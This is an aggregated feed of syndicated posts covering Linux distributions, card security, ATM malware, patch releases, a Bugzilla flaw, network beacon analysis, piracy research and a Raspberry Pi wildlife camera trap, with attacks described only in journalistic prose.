If you don’t have the budget for dedicated firewall appliances (such as those from Cisco), then a Linux firewall might just be the perfect solution. With the incredibly powerful iptables system, Linux makes for outstanding security. And there are plenty of routes to success with a Linux firewall. If you want a near out-of-the-box solution, take a look at IPCop. This particular firewall solution is geared toward home and SOHO usage, but offers a user-friendly, web-based interface that doesn’t require a system administrator’s level of understanding to use.

Of course, if you want absolute control of your firewall, you can also make use of a distribution like CentOS and learn the ins and outs of iptables.

Anonymous use

Finally, if you’re looking for a Linux distribution to use with anonymity, you want Tails.

Tails is a live Linux distribution that aims to leave no trace while protecting your privacy and anonymity. This particular Linux distribution takes great care to use cryptography to encrypt all data leaving the system. Tails is built on Debian and consists entirely of free software.


There you have it. A sort of guide to help you navigate the waters of use-specific Linux distributions. And as I’ve mentioned before, fundamentally Linux can be made to do whatever you want. Don’t assume you must use a niche- or task-specific distribution to get something done. With just a little know-how, you can make any distribution into exactly what you need.

For more information about Linux distributions, visit the following sites:

Krebs on Security: Chip & PIN vs. Chip & Signature

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

The Obama administration recently issued an executive order requiring that federal agencies migrate to more secure chip-and-PIN based credit cards for all federal employees that are issued payment cards. The move marks a departure from the far more prevalent “chip-and-signature” standard, an approach that has been overwhelmingly adopted by a majority of U.S. banks that are currently issuing chip-based cards. This post seeks to explore some of the possible reasons for the disparity.

Chip-based cards are designed to be far more expensive and difficult for thieves to counterfeit than regular credit cards that most U.S. consumers have in their wallets. Non-chip cards store cardholder data on a magnetic stripe, which can be trivially copied and re-encoded onto virtually anything else with a magnetic stripe.

Magnetic-stripe based cards are the primary target for hackers who have been breaking into retailers like Target and Home Depot and installing malicious software on the cash registers: The data is quite valuable to crooks because it can be sold to thieves who encode the information onto new plastic and go shopping at big box stores for stuff they can easily resell for cash (think high-dollar gift cards and electronics).

The United States is the last of the G20 nations to move to more secure chip-based cards. Other countries that have made this shift have done so by government fiat mandating the use of chip-and-PIN. Requiring a PIN at each transaction addresses both the card counterfeiting problem, as well as the use of lost or stolen cards.

Here in the States, however, the movement to chip-based cards has evolved overwhelmingly toward the chip-and-signature approach. Naturally, if your chip-and-signature card is lost or stolen and used fraudulently, there is little likelihood that a $9-per-hour checkout clerk is going to bat an eyelash at a thief who signs your name when using your stolen card to buy stuff at retailers. Nor will a signature card stop thieves from using a counterfeit card at automated payment terminals (think gas pumps).

But just how broadly adopted is chip-and-signature versus chip-and-PIN in the United States? According to an unscientific poll that’s been running for the past two years at the travel forum Flyertalk, only a handful of major U.S. banks issue chip-and-PIN cards; most have pushed chip-and-signature. Check out Flyertalk’s comprehensive Google Docs spreadsheet here for a member-contributed rundown of which banks support chip-and-PIN versus chip-and-signature.

I’ve been getting lots of questions from readers who are curious or upset at the prevalence of chip-and-signature over chip-and-PIN cards here in the United States, and I realized I didn’t know much about the reasons behind the disparity vis-a-vis other nations that have already made the switch to chip cards. So  I reached out to several experts to get their take on it.

Julie Conroy, a fraud analyst with The Aite Group, said that by and large Visa has been pushing chip-and-signature and that MasterCard has been promoting chip-and-PIN. Avivah Litan, an analyst at Gartner Inc., said MasterCard is neutral on the technology. For its part, Visa says it also is agnostic on the technology, saying in an emailed statement that the company believes “requiring stakeholders to use just one form of cardholder authentication may unnecessarily complicate the adoption of this important technology.”

BK: A lot of readers seem confused about why more banks wouldn’t adopt chip-and-PIN over chip-and-signature, given that the former protects against more forms of fraud.

Conroy: The PIN only addresses fraud when the card is lost or stolen, and in the U.S. market lost-and-stolen fraud is very small in comparison with counterfeit card fraud. Also, as we looked at other geographies — and our research has substantiated this — as you see these geographies go chip-and-PIN, the lost-and-stolen fraud dips a little bit but then the criminals adjust. So in the UK, the lost-and-stolen fraud is now back above where it was before the migration. The criminals there have adjusted, and that increased focus on capturing the PIN gives them more opportunity, because if they do figure out ways to compromise that PIN, then they can perpetrate ATM fraud and get more bang for their buck.

So, PIN at the end of the day is a static data element, and it only goes so far from a security perspective. And as you weigh that potential for attrition versus the potential to address the relatively small amount of fraud that is lost and stolen fraud, the business case for chip and signature is really a no-brainer.

Litan: Most card issuing banks and Visa don’t want PINs because the PINs can be stolen and used with the magnetic stripe data on the same cards (that also have a chip card) to withdraw cash from ATM machines. Banks eat the ATM fraud costs. This scenario has happened with the roll-out of chip cards with PIN – in Europe and in Canada.

BK: What are some of the things that have pushed more banks in the US toward chip-and-signature?

Conroy: As I talk to the networks and the issuers who have made their decision about where to go, there are a few things that are moving folks toward chip-and-signature. The first is that we are the most competitive market in the world, and so as you look at the business case for chip-and-signature versus chip-and-PIN, no issuer wants to have the card in the wallet that is the most difficult card to use.

BK: Are there recent examples that have spooked some of the banks away from embracing chip-and-PIN?

Conroy: There was a Canadian issuer that — when they did their migration to chip — really botched their chip-and-PIN roll out, and consumers were forgetting their PIN at the point-of-sale. That issuer saw a significant dip in transaction volume as a result. One of the missteps this issuer made was that they sent their PIN mailers out too soon before you could actually do PIN transactions at the point of sale, and consumers forgot. Also, at the time they sent out the cards, [the bank] didn’t have the capability at ATMs or IVRs (automated, phone-based customer service systems) for consumers to reset their PINs to something they could remember.

BK: But the United States has a much more complicated and competitive financial system, so wouldn’t you expect more issuers to be going with chip-and-PIN?

Conroy: With consumers having an average of about 3.3 cards in their wallet, and the US being a far more competitive card market, the issuers are very sensitive to that. As I was doing my chip-and-PIN research earlier this year, there was one issuer that said quite bluntly, “We don’t really think we can teach Americans to do two things at once. So we’re going to start with teaching them how to dip, and if we have another watershed event like the Target breach and consumers start clamoring for PIN, then we’ll adjust.” So the issuers I spoke with wanted to keep it simple: Go to market with plain vanilla, and once we get this working, we can evaluate adding some sprinkles and toppings later.

BK: What about the retailers? I would think more of them are in favor of chip-and-PIN over signature.

Litan: Retailers want PINs because they strengthen the security of the point-of-sale (POS) transaction and lessen the chances of fraud at the POS (which they would have to eat if they don’t have chip-accepting card readers but are presented with a chip card). Also retailers have traditionally been paying lower rates on PIN transactions as opposed to signature transactions, although those rates have more or less converged over time, I hear.

BK: Can you talk about the ability to use these signature cards outside the US? That’s been a sticking point in the past, no?

Conroy: The networks have actually done a good job over the last year to 18 months in pushing the [merchant banks] and terminal manufacturers to include “no cardholder verification method” as one of the options in the terminals. Which means that chip-and-signature cards are increasingly working. There was one issuer I spoke with that had issued chip-and-signature cards already for their traveling customers and they said that those moves by the networks and adjustments overseas meant that their chip-and-signature cards were working 98 percent of the time, even at the unattended kiosks, which were some of the things that were causing problems a lot of the time.

BK: Is there anything special about banks that have chosen to issue chip-and-PIN cards over chip-and-signature?

Conroy: Where we are seeing issuers go with chip-and-PIN, largely it is issuers where consumers have a very compelling reason to pull that particular card out of their wallet. So, we’re talking mostly about merchants who are issuing their own cards and have loyalty points for using that card at that store. That is where we don’t see folks worrying about the attrition risks so much, because they have another point of stickiness for that card.

BK: What did you think about the White House announcement that specifically called out chip-and-PIN as the chip standard the government is endorsing?

Conroy: The White House announcement I thought was pure political window dressing, especially when they claimed to be taking the lead on credit card security. Visa, for example, made their initial road map announcement back in 2011. And [the White House is] coming to the table three years later thinking that it’s going to influence the direction the market is taking, when many banks have spent in some cases upwards of a year coding toward these specifications? That just seems ludicrous to me. The chip-card train has been out of the station for a long time. And it seemed like political posturing at its best, or worst, depending on how you look at it.

Litan: I think it is very significant. It’s basically the White House taking the side of the card acceptors and what they prefer. Whatever the government does will definitely help drive trends, so I think it’s a big statement.

BK: So, I guess we should all be grateful that banks and retailers in the United States are finally taking steps to move toward chip cards, but it seems to me that as long as these chip cards still also store cardholder data on a magnetic stripe as a backup, that the thieves can still steal and counterfeit this card data — even from chip cards.

Litan: Yes, that’s the key problem for the next few years. Once mag stripe goes away, chip-and-PIN will be a very strong solution. The estimates are now that by the end of 2015, 50 percent of the cards and terminals will be chip-enabled, but it’s going to be several years before we get closer to full compliance. So, we’re probably about 2018 before we can start making plans to get rid of the magnetic stripe on these cards.

Krebs on Security: Spike in Malware Attacks on Aging ATMs

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

This author has long been fascinated with ATM skimmers, custom-made fraud devices designed to steal card data and PINs from unsuspecting users of compromised cash machines. But a recent spike in malicious software capable of infecting and jackpotting ATMs is shifting the focus away from innovative, high-tech skimming devices toward the rapidly aging ATM infrastructure in the United States and abroad.

Last month, media outlets in Malaysia reported that organized crime gangs had stolen the equivalent of about USD $1 million with the help of malware they’d installed on at least 18 ATMs across the country. Several stories about the Malaysian attack mention that the ATMs involved were all made by ATM giant NCR. To learn more about how these attacks are impacting banks and the ATM makers, I reached out to Owen Wild, NCR’s global marketing director, security compliance solutions.

Wild said ATM malware is here to stay and is on the rise.


BK: I have to say that if I’m a thief, injecting malware to jackpot an ATM is pretty money. What do you make of reports that these ATM malware thieves in Malaysia were all knocking over NCR machines?

OW: The trend toward these new forms of software-based attacks is occurring industry-wide. It’s occurring on ATMs from every manufacturer, multiple model lines, and is not something that is endemic to NCR systems. In this particular situation for the [Malaysian] customer that was impacted, it happened to be an attack on a Persona series of NCR ATMs. These are older models. We introduced a new product line for new orders seven years ago, so the newest Persona is seven years old.

BK: How many of your customers are still using this older model?

OW: Probably about half the install base is still on Personas.

BK: Wow. So, what are some of the common trends or weaknesses that fraudsters are exploiting that let them plant malware on these machines? I read somewhere that the crooks were able to insert CDs and USB sticks in the ATMs to upload the malware, and they were able to do this by peeling off the top of the ATMs or by drilling into the facade in front of the ATM. CD-ROM and USB drive bays seem like extraordinarily insecure features to have available on any customer-accessible portions of an ATM.

OW: What we’re finding is these types of attacks are occurring on standalone, unattended types of units where there is much easier access to the top of the box than you would normally find in the wall-mounted or attended models.

BK: Unattended….meaning they’re not inside of a bank or part of a structure, but stand-alone systems off by themselves.

OW: Correct.

BK: It seems like the other big factor with ATM-based malware is that so many of these cash machines are still running Windows XP, no?

This new malware, detected by Kaspersky Lab as Backdoor.MSIL.Tyupkin, affects ATMs from a major ATM manufacturer running Microsoft Windows 32-bit.

OW: Right now, that’s not a major factor. It is certainly something that has to be considered by ATM operators in making their migration move to newer systems. Microsoft discontinued updates and security patching on Windows XP, with very expensive exceptions. Where it becomes an issue for ATM operators is that maintaining Payment Card Industry (credit and debit card security standards) compliance requires that the ATM operator be running an operating system that receives ongoing security updates. So, while many ATM operators certainly have compliance issues, to this point we have not seen the operating system come into play.

BK: Really?

OW: Yes. If anything, the operating systems are being bypassed or manipulated with the software as a result of that.

BK: Wait a second. The media reports to date have observed that most of these ATM malware attacks were going after weaknesses in Windows XP?

OW: It goes deeper than that. Most of these attacks come down to two different ways of jackpotting the ATM. The first is what we call “black box” attacks, where some form of electronic device is hooked up to the ATM — basically bypassing the infrastructure in the processing of the ATM and sending an unauthorized cash dispense code to the ATM. That was the first wave of attacks we saw that started very slowly in 2012, went quiet for a while and then became active again in 2013.

The second type that we’re now seeing more of is attacks that start with the introduction of malware into the machine, and that kind of attack is a little less technical to get on the older machines if protective mechanisms aren’t in place.

BK: What sort of protective mechanisms, aside from physically securing the ATM?

OW: If you work on the configuration setting…for instance, if you lock down the BIOS of the ATM to eliminate its capability to boot from USB or CD drive, that gets you about as far as you can go. In high risk areas, these are the sorts of steps that can be taken to reduce risks.

BK: Seems like a challenge communicating this to your customers who aren’t anxious to spend a lot of money upgrading their ATM infrastructure.

OW: Most of these recommendations and requirements have to be considerate of the customer environment. We make sure we’ve given them the best guidance we can, but at the end of the day our customers are going to decide how to approach this.

BK: You mentioned black-box attacks earlier. Is there one particular threat or weakness that makes this type of attack possible? One recent story on ATM malware suggested that the attackers may have been aided by the availability of ATM manuals online for certain older models.

OW: The ATM technology infrastructure is all designed on multivendor capability. You don’t have to be an ATM expert or have inside knowledge to generate or code malware for ATMs. Which is what makes the deployment of preventative measures so important. What we’re faced with as an industry is a combination of vulnerability on aging ATMs that were built and designed at a point where the threats and risk were not as great.

According to security firm F-Secure, the malware used in the Malaysian attacks was “PadPin,” a family of malicious software first identified by Symantec. Also, Russian antivirus firm Kaspersky has done some smashing research on a prevalent strain of ATM malware that it calls “Tyupkin.” Their write-up on it is here, and the video below shows the malware in action on a test ATM.

In a report published this month, the European ATM Security Team (EAST) said it tracked at least 20 incidents involving ATM jackpotting with malware in the first half of this year. “These were ‘cash out’ or ‘jackpotting’ attacks and all occurred on the same ATM type from a single ATM deployer in one country,” EAST Director Lachlan Gunn wrote. “While many ATM Malware attacks have been seen over the past few years in Russia, Ukraine and parts of Latin America, this is the first time that such attacks have been reported in Western Europe. This is a worrying new development for the industry in Europe.”

Card skimming incidents fell by 21% compared to the same period in 2013, while overall ATM related fraud losses of €132 million (~USD $158 million) were reported, up 7 percent from the same time last year.

Krebs on Security: Microsoft, Adobe Push Critical Security Fixes

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

Adobe, Microsoft and Oracle each released updates today to plug critical security holes in their products. Adobe released patches for its Flash Player and Adobe AIR software. A patch from Oracle fixes at least 25 flaws in Java. And Microsoft pushed patches to fix at least two-dozen vulnerabilities in a number of Windows components, including Office, Internet Explorer and .NET. One of the updates addresses a zero-day flaw that reportedly is already being exploited in active cyber espionage attacks.

Earlier today, iSight Partners released research on a threat the company has dubbed “Sandworm” that exploits one of the vulnerabilities being patched today (CVE-2014-4114). iSight said it discovered that Russian hackers have been conducting cyber espionage campaigns using the flaw, which is apparently present in every supported version of Windows. The New York Times carried a story today about the extent of the attacks against this flaw.

In its advisory on the zero-day vulnerability, Microsoft said the bug could allow remote code execution if a user opens a specially crafted malicious Microsoft Office document. According to iSight, the flaw was used in targeted email attacks against NATO, Ukrainian and Western government organizations, and firms in the energy sector.

More than half of the other vulnerabilities fixed in this month’s patch batch address flaws in Internet Explorer. Additional details about the individual Microsoft patches released today are available at this link.

Separately, Adobe issued its usual round of updates for its Flash Player and AIR products. The patches plug at least three distinct security holes in these products. Adobe says it’s not aware of any active attacks against these vulnerabilities. Updates are available for Windows, Mac and Linux versions of Flash.

Adobe says users of the Adobe Flash Player desktop runtime for Windows and Macintosh should update to Adobe Flash Player 15.0.0.189. To see which version of Flash you have installed, check this link. IE10/IE11 on Windows 8.x and Chrome should auto-update their versions of Flash, although my installation of Chrome says it is up-to-date and yet is still running v. 15.0.0.152 (with no outstanding updates available, and no word yet from Chrome about when the fix might be available).

The most recent versions of Flash are available from the Flash home page, but beware potentially unwanted add-ons, like McAfee Security Scan. To avoid this, uncheck the pre-checked box before downloading, or grab your OS-specific Flash download from here.

Windows users who browse the Web with anything other than Internet Explorer may need to apply this patch twice, once with IE and again using the alternative browser (e.g., Firefox or Opera). If you have Adobe AIR installed, you’ll want to update this program. AIR ships with an auto-update function that should prompt users to update when they start an application that requires it; the newest, patched version is v. 15.0.0.293 for Windows, Mac, and Android.

Finally, Oracle is releasing an update for its Java software today that corrects more than two-dozen security flaws in the software. Oracle says 22 of these vulnerabilities may be remotely exploitable without authentication, i.e., may be exploited over a network without the need for a username and password. Java SE 8 updates are available here; the latest version of Java SE 7 is here.

If you really need and use Java for specific Web sites or applications, take a few minutes to update this software. Updates are available from Java.com or via the Java Control Panel. I don’t have an installation of Java handy on the machine I’m using to compose this post, but keep in mind that updating via the control panel may auto-select the installation of third-party software, so de-select that if you don’t want the added crapware.

Otherwise, seriously consider removing Java altogether. I’ve long urged end users to junk Java unless they have a specific use for it (this advice does not scale for businesses, which often have legacy and custom applications that rely on Java). This widely installed and powerful program is riddled with security holes, and is a top target of malware writers and miscreants.

If you have an affirmative use or need for Java, unplug it from the browser unless and until you’re at a site that requires it (or at least take advantage of click-to-play). The latest versions of Java let users disable Java content in web browsers through the Java Control Panel. Alternatively, consider a dual-browser approach, unplugging Java from the browser you use for everyday surfing, and leaving it plugged in to a second browser that you only use for sites that require Java.

For Java power users — or for those who are having trouble upgrading or removing a stubborn older version — I recommend JavaRa, which can assist in repairing or removing Java when other methods fail (requires the Microsoft .NET Framework, which also received updates today from Microsoft).

SANS Internet Storm Center, InfoCON: green: CSAM: Be Wary of False Beacons, (Mon, Oct 13th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

[This is a guest diary published on behalf of Chris Sanders]

Hunting for evil in network traffic depends on the analyst’s ability to locate patterns and variances in oceans of data. This can be an overwhelming task and relies on fundamental knowledge of what is considered normal on your network as well as your experience-based intuition. These dark waters are navigated by finding glimmers of light and following them where they lead you by carefully investigating all of the data sources and intelligence in your reach. While hunting the adversary in this manner can yield treasure, following some of these distant lights can also land you in the rocks.

One scenario that often puts analysts in murky waters occurs when they chase patterns of network traffic occurring over clearly visible intervals. This periodic activity often gets associated with beaconing, where analysts perceive the timing of the communication to mean that it may be the result of malicious code installed on a friendly system.

As an example, consider the flow records shown here:

Figure 1

If you look at the timestamps for each of these records, you will see that each communication sequence occurs almost exactly one minute from the previous. Along with this, the other characteristics of the communication appear to be similar. A consistent amount of data is being transferred from an internal host 172.16.16.137 to an external host 173.194.37.48 each time.
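
As a rough illustration of how this pattern can be surfaced at scale (not something from the diary itself), the short Python sketch below computes the inter-arrival times for flows between a host pair and flags conversations whose intervals are nearly constant. The flow records and the jitter threshold are made-up values for the example.

    from datetime import datetime
    from statistics import pstdev

    # Hypothetical flow records: (start time, source IP, destination IP, bytes)
    flows = [
        ("2014-10-13 09:01:02", "172.16.16.137", "173.194.37.48", 4200),
        ("2014-10-13 09:02:03", "172.16.16.137", "173.194.37.48", 4180),
        ("2014-10-13 09:03:02", "172.16.16.137", "173.194.37.48", 4210),
        ("2014-10-13 09:04:03", "172.16.16.137", "173.194.37.48", 4195),
    ]

    def looks_periodic(records, max_jitter_seconds=5.0):
        """Flag a conversation whose inter-arrival times are nearly constant."""
        times = sorted(datetime.strptime(t, "%Y-%m-%d %H:%M:%S") for t, *_ in records)
        if len(times) < 3:
            return False
        deltas = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        return pstdev(deltas) <= max_jitter_seconds

    if looks_periodic(flows):
        print("Near-constant interval: candidate beacon (or just a polling web app).")

A hit from a check like this is only a starting point; as the rest of the diary argues, plenty of benign software polls on a fixed schedule.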

So, what’s going on here? Less experienced analysts might jump to the conclusion that the friendly device is compromised and that it is beaconing back out to some sort of attacker-controlled command and control infrastructure. In reality, it doesn’t necessarily indicate anything malicious at all.

Figure 2

As analysts, we are taught to identify patterns and home in on those as potential signs of compromise. While this isn’t an entirely faulty concept, it should also be used with discretion. With dynamic content so prevalent on the modern Internet, it is incredibly common to encounter scenarios where devices communicate in a periodic nature. This includes platforms such as web-based e-mail clients, social networking websites, chat clients, and more.

Ultimately, all network traffic is good unless you can prove it’s bad. If you do need to dig in further in scenarios like this, try to make the best use of your time by looking for information you can use to immediately eliminate the potential that the traffic is malicious. This might include some basic research about the potentially hostile host like we did here, immediately pivoting to full PCAP data to view the content of the traffic when possible, or by simply examining the friendly host to determine which process is responsible for the connection(s). The ability to be selective of what you choose to investigate and to quickly eliminate likely false positives is the sign of a mature analyst. The next time you are hunting through data looking for evil, be wary when your eyes are drawn towards false beacons.

Blogs: http://www.chrissanders.org

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

TorrentFreak: NetNames Anti-Piracy Chief Moves to IFPI

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

NetNames is one of a number of brand protection businesses operating online today. The company, which aims to cushion the effects of fraud on its clients’ brands, positions itself as a global leader in the sector.

Established as Group NBT in 1995, the company was renamed NetNames in 2013 and shortly after grabbed dozens of headlines after publishing a major study into online piracy.

Commissioned by NBC Universal and titled ‘Sizing the Piracy Universe’, the study mapped piracy volumes and prevalence around the world. NetNames found that piracy is both “tenacious and persistent”, with a penchant for consuming increasing amounts of Internet bandwidth every year.

The report was overseen by Dr David Price, then Director of Piracy and Counterfeit Analysis at NetNames. Price also presided over the publication last month of NetNames’ latest piracy study which focused on the role played by credit card companies in the cyberlocker space.

Published exactly a year after the NBC study, ‘Behind The Cyberlocker Door: A Report on How Shadowy Cyberlockers Use Credit Card Companies to Make Millions’ was commissioned by the Digital Citizens Alliance (DCA), ostensibly to protect consumers. DCA doesn’t openly reveal its sources of funding but the report has all the hallmarks of an entertainment industry-focused study.

Previously, Price was the chief of Piracy Intelligence at Envisional and the head of a study claiming to be the first to accurately estimate the amount of infringing traffic on the Internet.

Now it appears that Price’s work has received the ultimate compliment from one of the most powerful entertainment industry organizations on the planet.

The International Federation of the Phonographic Industry, or IFPI as it’s more often called, is the umbrella anti-piracy organization for the world’s leading recording labels. As of now, IFPI – probably in their UK office since that’s where Price is based – has a new employee.

According to an amendment tucked away on his Linkedin profile, Price – who has a doctorate in Criminology from the University of Cambridge – is now working for the IFPI as their Head of Anti-Piracy Research and Analysis.

In recent years Price has maintained a clear anti-piracy stance, which will obviously suit IFPI. He has participated in discussions calling for government action against piracy and regularly uses content-industry friendly terms such as “stealing” to describe unauthorized copying.

TorrentFreak contacted NetNames’ PR company for a comment on Price’s departure but at the time of publication we were yet to receive a response.

IFPI London, where the organization’s anti-piracy operations are based, also did not immediately respond to a request for comment.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

TorrentFreak: Research Warns Against Overestimated Movie Piracy Losses

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

When it comes to movie piracy, Hollywood tends to be most concerned about unauthorized copies that appear online when a film is still playing in theaters.

These are often CAM releases, which are copies of the movie recorded in a theater. Despite their low quality, these CAMs are often downloaded hundreds of thousands if not millions of times.

To find out what effect these downloads have on box office revenues, APAS Laboratory researcher Marc Milot conducted a thorough field study. By using download statistics from the torrent site Demonoid, in combination with movie ratings and pre-release buzz, the study estimates the effect of CAM piracy on box office sales.

The findings, published this week in a paper titled “Testing the lost sale concept in the context of unauthorized BitTorrent downloads of CAM copies of theatrical releases”, reveal an intriguing pattern.

Based on a sample of 32 widely released movies, the results show that box office revenue could be best predicted by pre-release buzz and to a lesser extent by the rating of the movies, which were both taken from Rotten Tomatoes. Interestingly, the number of times a movie was pirated had no effect on its box office sales.

Instead of a link with sales, the number of unauthorized downloads was affected by how visible these titles were on Demonoid. TorrentFreak contacted Milot, who believes that these results support the notion that many pirates download movies to discover new content.

“The research findings are the first to support with concrete behavioral evidence what BitTorrent file-sharers have been saying all along: that they don’t always download movies – in this case CAM versions of theatrical releases – they would have paid to view if they were not available on sites like Demonoid,” Milot told us.

This notion is supported by the fact that, unlike at the box office, the rating of a movie doesn’t affect the piracy volume. This finding is based on ratings by both Pirate Bay and Rotten Tomatoes users, to control for the possibility that pirates simply have a different movie taste.

Downloads/sales by movie rating

According to the researcher, these results should caution the movie industry not to overestimate the effect of CAM piracy on box office sales.

“BitTorrent site users appear to be exploring and downloading the most visible movies, without caring how good or bad they are. It is in this way that BitTorrent sites and the box office are completely different systems in which people behave uniquely and with different motivations,” Milot explains.

“These findings should caution against the use of download statistics alone in calculations of losses – in this case lost ticket sales – to avoid overestimation,” he adds.

Whether the above will be a reassurance for Hollywood has yet to be seen. There have been several studies on the impact of movie piracy in recent years, often with conflicting results. The current research helps to add yet another piece to the puzzle.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Krebs on Security: Bugzilla Zero-Day Exposes Zero-Day Bugs

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

A previously unknown security flaw in Bugzilla — a popular online bug-tracking tool used by Mozilla and many of the open source Linux distributions — allows anyone to view detailed reports about unfixed vulnerabilities in a broad swath of software. Bugzilla is expected today to issue a fix for this very serious weakness, which potentially exposes a veritable gold mine of vulnerabilities that would be highly prized by cyber criminals and nation-state actors.

The Bugzilla mascot.

Multiple software projects use Bugzilla to keep track of bugs and flaws that are reported by users. The Bugzilla platform allows anyone to create an account that can be used to report glitches or security issues in those projects. But as it turns out, that same reporting mechanism can be abused to reveal sensitive information about as-yet unfixed security holes in software packages that rely on Bugzilla.

A developer or security researcher who wants to report a flaw in Mozilla Firefox, for example, can sign up for an account at Mozilla’s Bugzilla platform. Bugzilla responds automatically by sending a validation email to the address specified in the signup request. But recently, researchers at security firm Check Point Software Technologies discovered that it was possible to create Bugzilla user accounts that bypass that validation process.

“Our exploit allows us to bypass that and register using any email we want, even if we don’t have access to it, because there is no validation that you actually control that domain,” said Shahar Tal, vulnerability research team leader for Check Point. “Because of the way permissions work on Bugzilla, we can get administrative privileges by simply registering using an address from one of the domains of the Bugzilla installation owner. For example, we registered as admin@mozilla.org, and suddenly we could see every private bug under Firefox and everything else under Mozilla.”

Bugzilla is expected today to release updates to remove the vulnerability and help further secure its core product.

“An independent researcher has reported a vulnerability in Bugzilla which allows the manipulation of some database fields at the user creation procedure on Bugzilla, including the ‘login_name’ field,” said Sid Stamm, principal security and privacy engineer at Mozilla, which developed the tool and has licensed it for use under the Mozilla public license.

“This flaw allows an attacker to bypass email verification when they create an account, which may allow that account holder to assume some privileges, depending on how a particular Bugzilla instance is managed,” Stamm said. “There have been no reports from users that sensitive data has been compromised and we have no other reason to believe the vulnerability has been exploited. We expect the fixes to be released on Monday.”

The flaw is the latest in a string of critical and long-lived vulnerabilities to surface in the past year — including Heartbleed and Shellshock — that would be ripe for exploitation by nation state adversaries searching for secret ways to access huge volumes of sensitive data.

“The fact is that this was there for 10 years and no one saw it until now,” said Tal. “If nation state adversaries [had] access to private bug data, they would have a ball with this. There is no way to find out if anyone did exploit this other than going through user list and seeing if you have a suspicious user there.”

Like Heartbleed, this flaw was present in open source software to which countless developers and security experts had direct access for years on end.

“The perception that many eyes have looked at open source code and it’s secure because so many people have looked at it, I think this is false,” Tal said. “Because no one really audits code unless they’re committed to it or they’re paid to do it. This is why we can see such foolish bugs in very popular code.”

Raspberry Pi: A digital making community for wildlife: Naturebytes camera traps

This post was syndicated from: Raspberry Pi and was written by: Helen Lynn. Original post: at Raspberry Pi

Start-up Naturebytes hopes their 3D printed Raspberry Pi camera trap (a camera triggered by the presence of animals) will be the beginning of a very special community of makers.

Supported by the Raspberry Pi Foundation’s Education Fund and Nesta, Naturebytes aims to establish a digital making community for wildlife with a very important purpose. Their gadgets, creations and maker kits (and, hopefully, those of others who get involved) will be put to use collecting real data for conservation and wildlife research projects – and to kick it all off, they took their prototype 3D printed birdbox-style camera trap kit to family festival Camp Bestival to see what everyone thought.

NatureBytes camera trap prototype

If you were one of the lucky bunch to enjoy this year’s Camp Bestival, you’d have seen them over in the Science Tent with a colourful collection of their camera trap enclosures. The enclosure provides a snug home for a Raspberry Pi, Pi camera module, passive infrared sensor (PIR sensor), UBEC (a device used to regulate the power) and battery bank (they have plans to add external power capabilities, including solar, but for now they’re using eight trusty AA batteries to power the trap).

A colourful collection of camera trap enclosures

The PIR sensor does the job of detecting any wildlife passing by, and they’re using Python to control the camera module, which in turn snaps photos to the SD card. If you’re looking for nocturnal animals then the Pi NoIR could be used instead, with a bank of infrared LEDs to provide illumination.
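
Naturebytes haven’t published their code in this post, but a minimal sketch of the approach described (wait on the PIR sensor, then capture a still to the SD card with the camera module) might look something like this in Python; the GPIO pin, resolution and file naming are assumptions:

    import time
    from datetime import datetime

    import picamera
    import RPi.GPIO as GPIO

    PIR_PIN = 17  # assumption: PIR output wired to GPIO17

    GPIO.setmode(GPIO.BCM)
    GPIO.setup(PIR_PIN, GPIO.IN)

    with picamera.PiCamera() as camera:
        camera.resolution = (1920, 1080)
        try:
            while True:
                if GPIO.input(PIR_PIN):  # motion detected by the PIR sensor
                    filename = datetime.now().strftime("capture-%Y%m%d-%H%M%S.jpg")
                    camera.capture(filename)  # still image written to the SD card
                    time.sleep(5)             # simple cool-down between captures
                time.sleep(0.1)
        finally:
            GPIO.cleanup()

Swapping in the Pi NoIR for night-time use needs no code changes, only the infrared LED bank mentioned above.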

Naturebytes says:

When you’re aiming to create maker kits for all manner of ages, it’s useful to try out your masterpiece with actual users to see how they found the challenge.

Naturebytes at Camp Bestival

Explaining how the camera trap enclosures are printed

Assembling camera traps at Camp Bestival

Camp Bestival festival-goers assembling camera traps

With screwdrivers at the ready, teams of festival-goers first took a look at one of our camera enclosures being printed on an Ultimaker before everyone sat down to assemble their own trap ready for a Blue Peter-style “Here’s one I made earlier” photo opportunity (we duct-taped a working camera trap to the back of a large TV so everyone could be captured in an image).

In fact, using the cam.start_preview() Python function we could output a few seconds of video when the PIR sensor was triggered, so everyone could watch.

One camera trap in action capturing another camera trap

Naturebytes duct-taped a working camera trap to the back of a large TV so everyone could see a camera trap in action

Our grand plan is to support the upcoming Naturebytes community of digital makers by accepting images from thousands of Naturebytes camera traps out in gardens, schools or wildlife reserves to the Naturebytes website, so we can share them with active conservation projects. We could, for example, be looking for hedgehogs to monitor their decline, and push the images you’ve taken of hedgehogs visiting your garden directly to wildlife groups on the ground who want the cold hard facts as to how many can be found in certain areas.

Job done, Camp Bestival!

Keep your eyes peeled – Naturebytes is powering up for launch very soon!

TorrentFreak: Most Top Films Are Not Available on Netflix, Research Finds

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

There is little doubt that, in the United States, Netflix has become the standard for watching movies on the Internet.

The subscription service is responsible for a third of all Internet traffic during peak hours, dwarfing that of online piracy and other legal video platforms.

It’s safe to assume that Netflix is the best and most convenient alternative to piracy at this point. That is, if the service carries the movies people want to see. This appears to be a problem.

Research firm KPMG has just released a new study that looks at the online availability of the 808 most popular and critically acclaimed films. The study was commissioned by NBC Universal and praised by the MPAA, presumably to dispel the argument that many people pirate because they don’t have the option to watch some films legally.

“This first-of-its-kind report analyzed the availability of 808 different film titles over 34 major online video distribution services and found that 94 percent of the films were available on at least one service,” MPAA’s Chris Dodd commented on the study.

